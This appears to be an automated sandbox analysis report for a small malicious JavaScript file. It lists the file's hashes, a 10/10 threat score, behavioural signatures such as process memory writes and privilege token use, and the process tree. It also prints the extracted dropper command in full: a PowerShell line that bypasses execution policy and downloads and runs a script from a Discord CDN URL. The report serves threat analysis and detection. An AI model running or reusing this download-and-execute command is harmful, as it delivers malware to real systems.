Analysis
max time kernel: 118s
max time network: 118s
platform: windows7_x64
resource: win7-en-20211104
submitted: 02-12-2021 03:07
Static task: static1
Behavioral task: behavioral1
Sample: 34ce23e0cac1eb85e253f52b87c53436.js
Resource: win7-en-20211104
Platform: windows7_x64
0 signatures
0 seconds
General
Target: 34ce23e0cac1eb85e253f52b87c53436.js
Size: 256B
MD5: 34ce23e0cac1eb85e253f52b87c53436
SHA1: fbc026960fc1009eae89f7506276a5e153ec58ec
SHA256: ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104
SHA512: 488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d
Score: 10/10
Malware Config
Extracted
Language: ps1
Deobfuscated
URLs
ps1.dropper: https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt
Signatures
Blocklisted process makes network request (1 IoCs)
Processes: powershell.exe (flow 5, PID 860)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes: powershell.exe (PID 860)
Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: powershell.exe (PID 860), Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
wscript.exe (PID 1552) wrote to memory of powershell.exe (PID 860)
wscript.exe (PID 1552) wrote to memory of powershell.exe (PID 860)
wscript.exe (PID 1552) wrote to memory of powershell.exe (PID 860)
Processes
C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js
  PID: 1552
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))
    PID: 860
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
memory/860-56-0x0000000000000000-mapping.dmp
memory/860-59-0x00000000025A0000-0x00000000025A2000-memory.dmp (Filesize: 8KB)
memory/860-60-0x00000000025A2000-0x00000000025A4000-memory.dmp (Filesize: 8KB)
memory/860-61-0x00000000025A4000-0x00000000025A7000-memory.dmp (Filesize: 12KB)
memory/860-58-0x000007FEF28B0000-0x000007FEF340D000-memory.dmp (Filesize: 11.4MB)
memory/860-62-0x00000000025AB000-0x00000000025CA000-memory.dmp (Filesize: 124KB)
memory/1552-55-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp (Filesize: 8KB)